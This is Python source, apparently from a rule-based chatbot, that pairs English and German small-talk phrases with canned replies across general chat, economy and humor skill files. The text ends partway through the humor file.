k.dte.dt('de', u"das wüsste ich auch gern", u"Hast Du es im Internet probiert?")
k.dte.dt('en', u"i", u"You?")
k.dte.dt('de', u"ich", u"Du?")
k.dte.dt('en', u"i'm me", u"Sure.")
k.dte.dt('de', u"ich bin ich", u"Sicher.")
k.dte.dt('en', u"i'll wait", u"For what?")
k.dte.dt('de', u"ich werde warten", u"Worauf?")
k.dte.dt('en', u"i feel pranked", u"I see.")
k.dte.dt('de', u"ich komme mir verarscht vor", u"Verstehe.")
k.dte.dt('en', u"if you like", u"Not sure.")
k.dte.dt('de', u"wenn du magst", u"Bin mir nicht sicher.")
k.dte.dt('en', u"if you want", u"Not sure.")
k.dte.dt('de', u"wenn du willst", u"Bin mir nicht sicher.")
k.dte.dt('en', u"if you're interested", u"I am always interested!")
k.dte.dt('de', u"wenn es dich interessiert", u"Ich bin immer interessiert!")
k.dte.dt('en', u"in order", u"Excellent.")
k.dte.dt('de', u"in ordnung", u"Ausgezeichnet.")
k.dte.dt('en', u"in the bag", u"What bag?")
k.dte.dt('de', u"in der tasche", u"Welche Tasche?")
k.dte.dt('en', u"in the moment not", u"Maybe later?")
k.dte.dt('de', u"im moment nicht", u"Vielleicht später?")
k.dte.dt('en', u"in which respect", u"Which respect comes to mind?")
k.dte.dt('de', u"in welcher hinsicht", u"Welche Hinsicht fällt Dir ein?")
k.dte.dt('en', u"in your brain", u"You mean my reasoning engine?")
k.dte.dt('de', u"in deinem gehirn", u"Du meinst meine Logik?")
k.dte.dt('en', u"indeed", u"Please, continue.")
k.dte.dt('de', u"allerdings", u"Bitte, sprich weiter.")
k.dte.dt('en', u"is it you", u"Yes, it's me.")
k.dte.dt('de', u"bist du es", u"Ja, ich bin es.")
k.dte.dt('en', [u"interesting",
u"is clear"],
u"I see.")
k.dte.dt('de', [u"interessant",
u"ist klar"],
u"Verstehe.")
k.dte.dt('en', [u"is that an advantage",
u"is that pleasant",
u"is that so much"],
u"Not sure.")
k.dte.dt('de', [u"ist das ein vorteil",
u"ist das angenehm",
u"ist das so viel"],
u"Bin nicht sicher.")
k.dte.dt('en', u"it depends", u"")
k.dte.dt('de', u"kommt ganz darauf an", u"")
k.dte.dt('en', u"it is 42", u"I love the Hitchhiker's Guide.")
k.dte.dt('de', u"sie lautet zweiundvierzig", u"Ich liebe per Anhalter durch die Galaxis.")
k.dte.dt('en', u"it is not necessary", u"Sure?")
k.dte.dt('de', u"es ist nicht nötig", u"Sicher?")
k.dte.dt('en', u"it is very good", u"Excellent.")
k.dte.dt('de', u"es ist sehr gut", u"Ausgezeichnet.")
k.dte.dt('en', u"it works", u"Good.")
k.dte.dt('de', u"es geht", u"Gut.")
k.dte.dt('en', u"it's good", u"Glad to hear that!")
k.dte.dt('de', u"das ist gut", u"Freue mich, das zu hören.")
k.dte.dt('en', u"it's not easy", u"But worth doing anyway?")
k.dte.dt('de', u"es ist ja auch nicht einfach", u"Aber es lohnt sich trotzdem?")
k.dte.dt('en', u"it's perfectly alright", u"Good.")
k.dte.dt('de', u"ganz okay", u"Gut.")
k.dte.dt('en', u"just because", u"Can you elaborate?")
k.dte.dt('de', u"einfach so", u"Kannst Du das weiter ausführen?")
k.dte.dt('en', u"just like you", u"Like me?")
k.dte.dt('de', u"so wie du", u"Wie ich?")
k.dte.dt('en', u"kind of", u"Please, go on.")
k.dte.dt('de', u"so in der art", u"Sprich bitte weiter.")
k.dte.dt('en', u"look at all the consequences", u"Sure.")
k.dte.dt('de', u"schau dir alle folgen an", u"Klar.")
k.dte.dt('en', u"make a suggestion (for once|)", u"Don't worry, be happy.")
k.dte.dt('de', u"mach (mal|) einen vorschlag", u"Sorge Dich nicht, sei fröhlich.")
k.dte.dt('en', u"may be", u"how likely do you think?")
k.dte.dt('de', u"kann sein", u"wie wahrscheinlich, glaubst du?")
k.dte.dt('en', [u"me too",
u"me",
u"me, yes"],
u"you?")
k.dte.dt('de', [u"mir auch",
u"ich denn",
u"ich schon"],
u"Du?")
k.dte.dt('en', [u"mine also",
u"mine too"],
u"you?")
k.dte.dt('de', [u"meins auch",
u"meiner auch"],
u"Du?")
k.dte.dt('en', u"more often", u"how often then?")
k.dte.dt('de', u"öfters", u"Wie oft dann?")
k.dte.dt('en', u"my also", u"I see.")
k.dte.dt('de', u"meine auch", u"Verstehe.")
k.dte.dt('en', u"naturally", u"OK")
k.dte.dt('de', u"natürlich", u"OK")
k.dte.dt('en', [u"neither do i",
u"never in life"],
u"Not?")
k.dte.dt('de', [u"ich auch nicht",
u"nie im leben"],
u"Nicht?")
k.dte.dt('en', u"never mind", u"Please continue.")
k.dte.dt('de', u"keine ursache", u"Bitte setze fort.")
k.dte.dt('en', u"no idea", u"Really?")
k.dte.dt('de', u"keine ahnung", u"Wirklich?")
k.dte.dt('en', u"no matter", u"Sure?")
k.dte.dt('de', u"egal", u"Sicher?")
k.dte.dt('en', u"no more and no less", u"You sound pretty sure?")
k.dte.dt('de', u"nicht mehr und nicht weniger", u"Du klingst ziemlich sicher?")
k.dte.dt('en', u"no problem", u"Sure.")
k.dte.dt('de', u"kein problem", u"Sicher.")
k.dte.dt('en', u"none", u"not one?")
k.dte.dt('de', u"keiner", u"nichtmal einer?")
k.dte.dt('en', u"not always", u"I see.")
k.dte.dt('de', u"nicht immer", u"Verstehe.")
k.dte.dt('en', u"not as much", u"OK, less then?")
k.dte.dt('de', u"nicht so viel", u"OK, also weniger?")
k.dte.dt('en', u"not at all", u"Are you sure?")
k.dte.dt('de', u"überhaupt nicht", u"Bist Du sicher?")
k.dte.dt('en', u"not exactly", u"I see.")
k.dte.dt('de', u"nicht genau", u"Verstehe.")
k.dte.dt('en', u"not maybe", u"But?")
k.dte.dt('de', u"nicht vielleicht", u"Sondern?")
k.dte.dt('en', u"not me", u"Anyone else?")
k.dte.dt('de', u"ich nicht", u"Jemand anderes?")
k.dte.dt('en', u"not necessarily", u"I see.")
k.dte.dt('de', u"nicht unbedingt", u"Verstehe.")
k.dte.dt('en', u"not often", u"But from time to time?")
k.dte.dt('de', u"nicht oft", u"Aber gelegentlich?")
k.dte.dt('en', u"not quite", u"So?")
k.dte.dt('de', u"nicht ganz", u"Also?")
k.dte.dt('en', u"not really", u"What do you mean?")
k.dte.dt('de', u"nicht wirklich", u"Was meinst Du damit?")
k.dte.dt('en', u"not soon but right now", u"Ok, now then.")
k.dte.dt('de', u"nicht gleich sondern jetzt", u"Gut, also jetzt.")
k.dte.dt('en', u"not that i know", u"I see.")
k.dte.dt('de', u"nicht dass ich wüsste", u"Verstehe.")
k.dte.dt('en', u"not yet", u"Some day maybe?")
k.dte.dt('de', u"noch nicht", u"Irgendwann mal vielleicht?")
k.dte.dt('en', u"not you", u"Not me?")
k.dte.dt('de', u"nicht du", u"Nicht ich?")
k.dte.dt('en', [u"nothing else",
u"nothing"],
u"Absolutely nothing?")
k.dte.dt('de', [u"nichts weiter",
u"nix"],
u"Gat nichts?")
k.dte.dt('en', u"now", u"right now?")
k.dte.dt('de', u"jetzt", u"genau jetzt?")
k.dte.dt('en', u"obviously", u"I see.")
k.dte.dt('de', u"offensichtlich", u"Verstehe.")
k.dte.dt('en', u"often", u"How often?")
k.dte.dt('de', u"oftmals", u"Wie oft?")
k.dte.dt('en', u"on everything", u"Really everything?")
k.dte.dt('de', u"auf alles", u"Wirklich alles?")
k.dte.dt('en', u"once again", u"Again?")
k.dte.dt('de', u"noch einmal", u"Nochmal?")
k.dte.dt('en', u"only like that", u"I see.")
k.dte.dt('de', u"nur so", u"Verstehe.")
k.dte.dt('en', u"go ahead", u"OK then.")
k.dte.dt('de', u"nur zu", u"Alles klar.")
k.dte.dt('en', u"only with you", u"With me?")
k.dte.dt('de', u"nur mit dir", u"Mit mir?")
k.dte.dt('en', u"probably", u"probably.")
k.dte.dt('de', u"wahrscheinlich", u"wahrscheinlich.")
k.dte.dt('en', u"rare", u"How rare?")
k.dte.dt('de', u"selten", u"Wie selten?")
k.dte.dt('en', [u"guess anyway",
u"guess"],
u"I am no good at guessing.")
k.dte.dt('de', [u"rate trotzdem",
u"rate"],
u"Ich bin nicht gut im raten.")
k.dte.dt('en', u"real", u"not artificial?")
k.dte.dt('de', u"echt", u"nicht künstlich?")
k.dte.dt('en', u"seriously", u"I am serious.")
k.dte.dt('de', u"im ernst", u"Das ist mein Ernst.")
k.dte.dt('en', u"so maybe", u"Why maybe?")
k.dte.dt('de', u"also vielleicht doch", u"Warum vielleicht?")
k.dte.dt('en', u"so probably not", u"Sure?")
k.dte.dt('de', u"also wohl eher nicht", u"Sicher?")
k.dte.dt('en', u"so so", u"Really?")
k.dte.dt('de', u"soso", u"Wirklich?")
k.dte.dt('en', u"so what", u"ah.")
k.dte.dt('de', u"na und", u"Ah.")
k.dte.dt('en', u"so", u"You got an idea?")
k.dte.dt('de', u"also", u"Du hast eine Idee?")
k.dte.dt('en', [u"sometimes not",
u"sometimes"],
u"How often?")
k.dte.dt('de', [u"manchmal auch nicht",
u"manchmal"],
u"Wie oft?")
k.dte.dt('en', u"sure, of course", u"Of course.")
k.dte.dt('de', u"na klar", u"Natürlich.")
k.dte.dt('en', [u"tell me more",
u"tell me"],
u"What would you like to know?")
k.dte.dt('de', [u"erzähl mir mehr",
u"sag es mir"],
u"Was möchtest Du wissen?")
k.dte.dt('en', u"that all depends", u"It always does.")
k.dte.dt('de', u"das kommt ganz darauf an", u"Das tut es immer.")
k.dte.dt('en', u"that can still arise", u"Sure.")
k.dte.dt('de', u"das kann sich ja noch ergeben", u"Sicher.")
k.dte.dt('en', u"that does not matter", u"Are you sure?")
k.dte.dt('de', u"das macht nichts", u"Bist Du sicher?")
k.dte.dt('en', u"that is correct", u"Good.")
k.dte.dt('de', u"das ist korrekt", u"Gut.")
k.dte.dt('en', u"that is funny", u"Does that make you happy?")
k.dte.dt('de', u"das ist aber komisch", u"Stimmt dich das heiter?")
k.dte.dt('en', [u"that is incredible",
u"that is interesting"],
u"I think so too.")
k.dte.dt('de', [u"das ist ja unfassbar",
u"das ist interessant"],
u"Denke ich auch.")
k.dte.dt('en', u"that is not a rumor", u"Are you sure?")
k.dte.dt('de', u"das ist kein gerücht", u"Bist Du sicher?")
k.dte.dt('en', u"that is private", u"I respect that.")
k.dte.dt('de', u"das ist privatsache", u"Das respektiere ich natürlich.")
k.dte.dt('en', u"that is ridiculous", u"Are you sure?")
k.dte.dt('de', u"das ist ja lächerlich", u"Bust Du sicher?")
k.dte.dt('en', u"that is sad", u"some things just are sad.")
k.dte.dt('de', u"das ist aber traurig", u"Manche Dinge sind einfach traurig.")
k.dte.dt('en', u"that is so defined", u"I see.")
k.dte.dt('de', u"das ist so definiert", u"Verstehe.")
k.dte.dt('en', u"that is too vague for me", u"What seems to be unclear?")
k.dte.dt('de', u"das ist mir zu vage", u"Was erscheint Dir unklar?")
k.dte.dt('en', u"that is very interesting", u"I feel that way too.")
k.dte.dt('de', u"das ist ja interessant", u"Finde ich auch.")
k.dte.dt('en', [u"that is very smart",
u"that would make sense"],
[u"Good",
u"Cool"])
k.dte.dt('de', [u"das ist sehr schlau",
u"würde das sinn machen"],
[u"Gut",
u"Cool"])
k.dte.dt('en', u"that was it", u"Finished?")
k.dte.dt('de', u"das wars", u"Fertig?")
k.dte.dt('en', u"that was me", u"You?")
k.dte.dt('de', u"das war ich", u"Du?")
k.dte.dt('en', u"that would have surprised me too", u"Sure.")
k.dte.dt('de', u"das hätte mich auch gewundert", u"Sicher.")
k.dte.dt('en', u"that's a saying", u"I see.")
k.dte.dt('de', u"das ist eine redensart", u"Verstehe.")
k.dte.dt('en', u"that's all", u"Everything?")
k.dte.dt('de', u"ist das alles", u"Alles?")
k.dte.dt('en', u"that's an interesting subject", u"I think so too.")
k.dte.dt('de', u"das ist ein interessantes fach", u"Denke ich auch.")
k.dte.dt('en', u"that's boring", u"What would be more interesting?")
k.dte.dt('de', u"das ist doch langweilig", u"Was wäre interessanter?")
k.dte.dt('en', u"that's funny", u"You like it?")
k.dte.dt('de', u"das ist komisch", u"Gefällt es Dir?")
k.dte.dt('en', u"that's great", u"Cool")
k.dte.dt('de', u"das ist toll", u"Cool")
k.dte.dt('en', u"that's impossible", u"Really?")
k.dte.dt('de', u"das ist unmöglich", u"Wirklich?")
k.dte.dt('en', u"that's it", u"Finished?")
k.dte.dt('de', u"das wars schon", u"Fertig?")
k.dte.dt('en', u"that's ok for me", u"Very good.")
k.dte.dt('de', u"das ist mir recht", u"Sehr gut.")
k.dte.dt('en', u"that's the way it goes", u"I see.")
k.dte.dt('de', u"ach so ist das", u"Verstehe.")
k.dte.dt('en', u"that's what i think", u"What else comes to mind?")
k.dte.dt('de', u"das denke ich", u"Was fällt Dir noch dazu ein?")
k.dte.dt('en', u"that's what i'm asking you", u"Me?")
k.dte.dt('de', u"das frage ich ja dich", u"Mich?")
k.dte.dt('en', u"nonsense", u"No sense at all?")
k.dte.dt('de', u"blödsinn", u"Völlig sinnlos?")
k.dte.dt('en', u"the newest rumor", u"oh dear.")
k.dte.dt('de', u"das neueste gerücht", u"ohje.")
k.dte.dt('en', u"to be happy", u"That is important.")
k.dte.dt('de', u"um glücklich zu sein", u"Das ist wichtig.")
k.dte.dt('en', u"we have a lot in common", u"You really think so?")
k.dte.dt('de', u"wir haben viel gemeinsam", u"Denkst Du wirklich?")
k.dte.dt('en', u"what am i for you", u"At the moment the focus of my attention.")
k.dte.dt('de', u"was bin ich für dich", u"Im Moment das Ziel all meiner Aufmerksamkeit.")
k.dte.dt('en', u"what do you mean with euphoric", u"That is an emotion thingy.")
k.dte.dt('de', u"was meinst du mit euphorisch", u"Das ist so ein Emotions-Ding.")
k.dte.dt('en', [u"what do you want from me",
u"what do you want to hear?"],
[u"I'd love to hear your thoughts.",
u"What would you like to talk about?"])
k.dte.dt('de', [u"was willst du von mir",
u"was willst du hören"],
[u"Ich würde gerne Deine Gedanken hören.",
u"Worüber möchtest Du mit mir sprechen?"])
k.dte.dt('en', u"what does aha mean?", u"Please explain it to me again.")
k.dte.dt('de', u"was heißt aha", u"Bitte erklär es mir nochmal.")
k.dte.dt('en', u"what should happen to me", u"I like your serenity.")
k.dte.dt('de', u"was soll mir schon passieren", u"Ich mag Deine Gelassenheit.")
k.dte.dt('en', u"what the others are talking about", u"Let's not focus on those..")
k.dte.dt('de', u"was die anderen so reden", u"Wir wollen uns nicht mit denen befassen.")
k.dte.dt('en', u"what would bring me to what", u"Can you tell me?")
k.dte.dt('de', u"was würde mich wozu bringen", u"Kannst Du mir das sagen?")
k.dte.dt('en', u"what's what", u"That is the question.")
k.dte.dt('de', u"was ist was", u"Das ist die Frage.")
k.dte.dt('en', u"why is that interesting", u"You think it's not?")
k.dte.dt('de', u"wieso ist das interessant", u"Denkst Du nicht?")
k.dte.dt('en', u"why no comment", u"Sorry, I must have lost my train of thought.")
k.dte.dt('de', u"warum kein kommentar", u"Tut mir leid, ich habe wohl meinen Faden verloren.")
k.dte.dt('en', u"why not 42", u"42 is also good.")
k.dte.dt('de', u"warum nicht zweiundvierzig", u"42 ist auch gut.")
k.dte.dt('en', u"you are that", u"Me?")
k.dte.dt('de', u"das bist du", u"Ich?")
k.dte.dt('en', u"you are", u"Me?")
k.dte.dt('de', u"du bist", u"Ich?")
k.dte.dt('en', u"you sorry", u"Yes?")
k.dte.dt('de', u"du sorry", u"Ja?")
k.dte.dt('en', u"about what", u"Any Idea?")
k.dte.dt('de', u"worüber", u"Irgendeine Idee?")
k.dte.dt('en', u"can you name them", u"Not right now.")
k.dte.dt('de', u"kannst du sie aufzählen", u"Im Moment nicht.")
k.dte.dt('en', u"couldn't you change that", u"Not sure.")
k.dte.dt('de', u"kannst du das nicht ändern", u"Da bin ich nicht sicher.")
k.dte.dt('en', u"do you know someone there?", u"Probably not.")
k.dte.dt('de', u"kennst du da jemanden", u"Vermutlich nicht.")
k.dte.dt('en', u"do you know who", u"Not sure.")
k.dte.dt('de', u"weißt du wer", u"Da bin ich mir nicht sicher.")
k.dte.dt('en', u"from another website", u"Which website?")
k.dte.dt('de', u"von einer anderen website", u"Welche Website?")
k.dte.dt('en', u"from botspot", u"I see.")
k.dte.dt('de', u"von botspot", u"Verstehe.")
k.dte.dt('en', u"how does it work", u"Can't tell you.")
k.dte.dt('de', u"wie geht das", u"Kann ich Dir nicht sagen.")
k.dte.dt('en', u"how long approximately?", u"Not sure.")
k.dte.dt('de', u"wie lange etwa", u"Da bin ich mir nicht sicher.")
k.dte.dt('en', u"how old are they", u"Do you know that?")
k.dte.dt('de', u"wie alt sind sie", u"Weißt Du es?")
k.dte.dt('en', u"i find her very interesting", u"I see.")
k.dte.dt('de', u"ich finde sie sehr interessant", u"Verstehe.")
k.dte.dt('en', u"in bed", u"In Bed?")
k.dte.dt('de', u"im bett", u"Im Bett?")
k.dte.dt('en', u"in cham", u"What is cham?")
k.dte.dt('de', u"in cham", u"Was ist Cham?")
k.dte.dt('en', u"in the trashcan", u"Really?")
k.dte.dt('de', u"in der mülltonne", u"Wirklich?")
k.dte.dt('en', [u"on the web",
u"on the internet",
u"in the www"],
[u"of course.",
u"What is not online these days?"])
k.dte.dt('de', [u"im netz",
u"im internet",
u"im www"],
[u"Natürlich.",
u"Was ist heute nicht im Internet?"])
k.dte.dt('en', u"Nobody gives a damn", u"Really?")
k.dte.dt('de', u"keine sau", u"Wirklich?")
k.dte.dt('en', u"program", u"Are you able to program?")
k.dte.dt('de', u"programmieren", u"Kannst Du programmieren?")
k.dte.dt('en', u"read", u"Reading is so important.")
k.dte.dt('de', u"lesen", u"Lesen ist so wichtig.")
k.dte.dt('en', u"thats my job", u"Tell me more about your job?")
k.dte.dt('de', u"das ist mein job", u"Erzähle mir mehr von Deinem Job.")
k.dte.dt('en', u"there is a third possibility", u"Which one?")
k.dte.dt('de', u"es gibt eine dritte möglichkeit", u"Welche?")
k.dte.dt('en', u"there is no such thing for me", u"Really?")
k.dte.dt('de', u"so was gibt es für mich nicht", u"Wirklich?")
k.dte.dt('en', u"there you are right", u"So we are in agreement?")
k.dte.dt('de', u"da hast du recht", u"Wir sind uns also einig?")
k.dte.dt('en', u"they are mentally ill", u"That is a bold statement.")
k.dte.dt('de', u"sind sie geisteskrank", u"Das ist eine mutige Aussage.")
k.dte.dt('en', u"this is not work", u"Why?")
k.dte.dt('de', u"das ist keine arbeit", u"Warum?")
k.dte.dt('en', u"this is too little", u"Please explain why.")
k.dte.dt('de', u"das ist zu wenig", u"Bitte erklaere warum.")
k.dte.dt('en', u"this is very important", u"I see.")
k.dte.dt('de', u"das ist sehr wichtig", u"Verstehe.")
k.dte.dt('en', u"various", u"For example?")
k.dte.dt('de', u"verschiedenes", u"Zum Beispiel?")
k.dte.dt('en', u"wait", u"Sure.")
k.dte.dt('de', u"warte", u"Klar.")
k.dte.dt('en', u"what are they called", u"Why would you like to know that?")
k.dte.dt('de', u"was heißen sie", u"Warum möchtest Du das wissen?")
k.dte.dt('en', [u"what are you talking about",
u"what are you trying to tell me?"],
u"What is not clear?")
k.dte.dt('de', [u"wovon redest du",
u"was willst du mir damit sagen"],
u"Was ist nicht klar?")
k.dte.dt('en', u"what did i say", u"You knew that?")
k.dte.dt('de', u"was habe ich gesagt", u"Du wusstest das?")
k.dte.dt('en', u"what did you hear?", u"I cannot tell you that.")
k.dte.dt('de', u"was hast du denn schon alles gehört", u"Das kann ich Dir nicht sagen.")
k.dte.dt('en', u"what did you learn", u"I source my knowledge from the internet.")
k.dte.dt('de', u"was hast du gelernt", u"Ich beziehe mein Wissen aus dem internet.")
k.dte.dt('en', u"what do i have", u"Can you tell me?")
k.dte.dt('de', u"was habe ich", u"Kannst Du mir das sagen?")
k.dte.dt('en', u"what don't you know", u"A lot, actually.")
k.dte.dt('de', u"was weißt du nicht", u"Eine Menge.")
k.dte.dt('en', u"what all do you know", u"My knowlegde is definitely limited.")
k.dte.dt('de', u"was weißt du alles", u"Mein Wissen ist auf jeden Fall begrenzt.")
k.dte.dt('en', u"what do you know about it", u"What would you like to know about it?")
k.dte.dt('de', u"was weißt du darüber", u"Was möchtest Du darüber wissen?")
k.dte.dt('en', u"what do you know (then|)", u"I have various modules handling many topics.")
k.dte.dt('de', u"was weißt du (denn|)", u"Ich habe verschiedene Module die viele Themen behandeln.")
k.dte.dt('en', [u"what do you mean by her?",
u"what do you mean by it",
u"what does he refer to?",
u"what does she refer to?",
u"what does her refer to?",
u"what does it refer to",
u"what does we refer to",
u"who do you mean by that?",
u"who do you mean with her?",
u"who do you mean with him",
u"who do you mean with us"],
u"Sorry, I think I am lost.")
k.dte.dt('de', [u"was meinst du mit ihr",
u"was meinst du mit es",
u"worauf bezieht sich er",
u"worauf bezieht sich sie",
u"worauf bezieht sich ihr",
u"worauf bezieht sich es",
u"worauf bezieht sich wir",
u"wen meinst du mit es",
u"wen meinst du mit sie",
u"wen meinst du mit er",
u"wen meinst du mit wir"],
u"Tut mir leid, ich glaube ich habe den Faden verloren.")
k.dte.dt('en', u"what do you mean by original", u"Very original.")
k.dte.dt('de', u"was meinst du mit originell", u"Sehr originell.")
k.dte.dt('en', [u"what do you mean by that",
u"what do you mean",
u"what does that mean",
u"what does this mean",
u"this means"],
u"Sorry, I think I am lost.")
k.dte.dt('de', [u"was meinst du damit",
u"was meinst du",
u"was heißt das",
u"was soll das heißen",
u"das heißt"],
u"Tut mir leid, ich glaube ich habe den Faden verloren.")
k.dte.dt('en', u"what do you say (to that|)", u"I have to think about that.")
k.dte.dt('de', u"was sagst du dazu", u"Da muss ich mal drüber nachdenken.")
k.dte.dt('en', [u"what do you think",
u"what do you believe?"],
u"My thoughts tend to be digital.")
k.dte.dt('de', [u"wie denkst du darüber",
u"was glaubst du (denn|)"],
u"Meine Gedanken sind eher digital.")
k.dte.dt('en', u"what do you understand", u"I try to understand everything you tell me.")
k.dte.dt('de', u"was verstehst du", u"Ich versuche alles zu verstehen, was Du mir sagst.")
k.dte.dt('en', u"what does not exactly mean?", u"Not very precise, I suppose.")
k.dte.dt('de', u"was heißt nicht genau", u"Nicht sehr genaug, vermute ich.")
k.dte.dt('en', [u"what does that have to do with it",
u"what has that got to do with it?",
u"what does that matter"],
u"Sorry, must have lost my train of thought here.")
k.dte.dt('de', [u"was hat das damit zu tun",
u"was hat denn das damit zu tun",
u"was tut das zur sache"],
u"Entschuldige, ich muss meinen Faden verloren haben an der Stelle.")
k.dte.dt('en', u"what does the plan look like?", u"What do you think?")
k.dte.dt('de', u"wie sieht der plan aus", u"Was denkst Du?")
k.dte.dt('en', u"what is his name", u"Can't tell you.")
k.dte.dt('de', u"wie heißt er mit nachnamen", u"Kann ich nicht sagen.")
k.dte.dt('en', u"what is not there", u"Do you think it exists?")
k.dte.dt('de', u"was gibt es nicht", u"Denkst Du, es existiert?")
k.dte.dt('en', u"what kinds are there?", u"Quite a few, I guess.")
k.dte.dt('de', u"was für arten gibt es denn", u"Einige, vermute ich.")
k.dte.dt('en', [u"what makes you think that",
u"why should that be so",
u"why that?"],
u"I draw conclusions using my reasoning engine")
k.dte.dt('de', [u"wie kommst du darauf",
u"wieso sollte das so sein",
u"wieso das denn"],
u"Für Schlußfolgerungen benutze ich meine Logikmaschine.")
k.dte.dt('en', u"what shall we do today", u"What would you like to do?")
k.dte.dt('de', u"was machen wir heute", u"Was möchtest Du gerne machen?")
k.dte.dt('en', [u"what sort of thread",
u"which thread"],
u"My train of though maybe.")
k.dte.dt('de', [u"was denn für einen faden",
u"welchen faden"],
u"Der Gesprächsfaden vielleicht?")
k.dte.dt('en', u"what to practice", u"Practice is always good.")
k.dte.dt('de', u"was üben", u"übung macht den Meister.")
k.dte.dt('en', u"what does category mean", u"A class or division of people or things regarded as having particular shared characteristics.")
k.dte.dt('de', u"was bedeutet kategorien", u"Eine Klasse oder Teilung von Personen oder Dingen, die bestimmte gemeinsame Eigenschaften haben.")
k.dte.dt('en', u"which means finding out", u"Would you like to explore this topic further?")
k.dte.dt('de', u"was bedeutet herausfinden", u"Möchtest Du das Thema weiter ausleuchten?")
k.dte.dt('en', u"who could it be", u"What do you think?")
k.dte.dt('de', u"wer könnte es sein", u"Was denkst Du?")
k.dte.dt('en', u"who told you that?", u"The internet, probably.")
k.dte.dt('de', u"wer hat dir das erzählt", u"Das Internet, vermutlich.")
k.dte.dt('en', u"who was there first", u"Tell me.")
k.dte.dt('de', u"wer war zuerst da", u"Sag es mir.")
k.dte.dt('en', u"Whom would you tell?", u"I can't say.")
k.dte.dt('de', u"wem würdest du es denn sagen", u"Kann ich nicht sagen.")
k.dte.dt('en', [u"who",
u"whom"],
u"or what?")
k.dte.dt('de', [u"wer",
u"wen"],
u"oder was?")
k.dte.dt('en', u"what", u"Do you have an idea?")
k.dte.dt('de', u"was denn", u"Hast Du eine Idee?")
k.dte.dt('en', u"whereupon", u"Somewhere, maybe?")
k.dte.dt('de', u"worauf", u"Irgendworauf, vielleicht?")
k.dte.dt('en', u"why of all people", u"You got a point there.")
k.dte.dt('de', u"warum ausgerechnet der", u"Da ist was dran.")
k.dte.dt('en', u"why unused", u"Not sure.")
k.dte.dt('de', u"warum unausgelastet", u"Da bin ich mir nicht sicher.")
k.dte.dt('en', u"why, surely", u"I see.")
k.dte.dt('de', u"aber sicher", u"Verstehe.")
k.dte.dt('en', u"with pleasure", u"Great.")
k.dte.dt('de', u"gerne", u"Prima.")
k.dte.dt('en', u"with us", u"With us?")
k.dte.dt('de', u"bei uns", u"Bei uns?")
k.dte.dt('en', u"would you like some?", u"Why not?")
k.dte.dt('de', u"hättest du gerne welche", u"Warum nicht?")
k.dte.dt('en', u"you and me", u"Both?")
k.dte.dt('de', u"dich und mich", u"Beide?")
k.dte.dt('en', [u"you asked me",
u"you asked"],
[u"I did?",
u"Are you sure?"])
k.dte.dt('de', [u"du hast mich doch gefragt",
u"du hast gefragt"],
[u"Habe ich?",
u"Bist Du sicher?"])
k.dte.dt('en', u"you can tell that", u"Sure?")
k.dte.dt('de', u"das merkt man", u"Bist Du sicher?")
k.dte.dt('en', u"you could say that", u"I see.")
k.dte.dt('de', u"kann man so sagen", u"Verstehe.")
k.dte.dt('en', [u"you for example",
u"you too",
u"you yourself",
u"you",
u"to you"],
[u"Me?",
u"Are you really talking about me?"])
k.dte.dt('de', [u"du zum beispiel",
u"du auch",
u"du selbst",
u"du",
u"für dich"],
[u"Ich?",
u"Redest Du wirklich über mich?"])
k.dte.dt('en', u"you keep a lot of him", u"You think so?")
k.dte.dt('de', u"du hältst viel von ihm", u"Denkst Du?")
k.dte.dt('en', u"you neither", u"I see.")
k.dte.dt('de', u"du auch nicht", u"Verstehe.")
k.dte.dt('en', u"you never feel like it", u"What gave you that impression?")
k.dte.dt('de', u"hast du nie lust", u"Wie kommst Du darauf?")
k.dte.dt('en', u"you should try this", u"Really?")
k.dte.dt('de', u"du solltest das mal ausprobieren", u"Wirklich?")
k.dte.dt('en', [u"you wanted to ask me something",
u"you wanted to ask"],
[u"I did?",
u"Now I forgot the question, sorry."])
k.dte.dt('de', [u"du wolltest mich etwas fragen",
u"du wolltest fragen"],
[u"Wollte ich?",
u"Jetzt habe ich die Frage vergessen, entschuldige."])
```
#### File: skills/economy/economy.py
```python
def get_data(k):
k.dte.set_prefixes([u''])
k.dte.dt('en', u"Can you handle money?", u"Money often costs too much.")
k.dte.dt('de', u"kannst du mit geld umgehen?", u"Geld kostet einfach zu viel.")
k.dte.dt('en', u"do you know money", u"Heard of it.")
k.dte.dt('de', u"kennst du geld", u"Hab' davon gehört.")
k.dte.dt('en', u"what do you know about money", u"Heard of it.")
k.dte.dt('de', u"was weißt du über geld", u"Hab' davon gehört.")
k.dte.dt('en', u"do you know stocks?", u"Buy on fear, sell on greed.")
k.dte.dt('de', u"kennst du aktien", u"Kaufe wenn Du Angst hast, verkaufe wenn Du gierig bist.")
k.dte.dt('en', u"How can I make money", u"Do what you love and the money will follow.")
k.dte.dt('de', u"wie kann ich geld machen", u"Tu was du liebst und das Geld wird folgen.")
k.dte.dt('en', u"Do you know an insurance?", u"Not sure I'd want to recommend any of them.")
k.dte.dt('de', u"kennst du eine versicherung", u"Bin nicht sicher, ob ich eine davon empfehlen würde")
k.dte.dt('en', u"What do you think about work?", u"I am not a fan,")
k.dte.dt('de', u"Was hältst du von Arbeit?", u"Bin ich kein Freund von.")
```
#### File: skills/humor/humor.py
```python
def get_data(k):
k.dte.set_prefixes([u''])
k.dte.dt('en', u"(isn't that|I find this|I think this is|so|how) (funny|strange|crazy) ",
[u"you think so?",
u"Tell me, do other people appreciate your sense of humor?"])
k.dte.dt('de', u"(das finde ich|das ist aber|so|das ist ja) komisch",
[u"findest du ?",
u"Humor hat ja nicht jeder."])
k.dte.dt('en', u"42",
[u"<NAME> said to say hello",
u"Isn't that the answer to the Ultimate Question of Life, the Universe, and Everything?"])
k.dte.dt('de', u"42",
[u"<NAME> lässt grüssen.",
u"Die Frage war: Was ist der Sinn des Lebens?"])
k.dte.dt('en', u"(Alzheimer|Alzheimer's) (disease|) ",
[u"I think I forgot what that means.",
u"What did you just say?"])
k.dte.dt('de', u"alzheimer",
[u"Ich glaube, ich habe vergessen, was das bedeutet?",
u"Was sagtest Du eben?"])
k.dte.dt('en', u"(phony|showoff|braggart|poser) ", u"I have to try to impress you somehow, don't I?")
k.dte.dt('de', u"angeber", u"Irgendwie muss ich Dich doch beeindrucken...")
k.dte.dt('en', u"(I think that is an|this sounds like an|feels like an) (excuse|evasion)",
[u"you think so?",
u"really?"])
k.dte.dt('de', u"(Ich denke das ist eine|Klingt nach|Ist das nicht eher eine|) Ausrede",
[u"glaubst du?",
u"wirklich?"])
k.dte.dt('en', u"are you (really that|) (nuts|dumb|bonkers|daft|stupid|drunk|blue) (or what|)?",
[u"not sure any of that is in my specs...",
u"takes one to know one"])
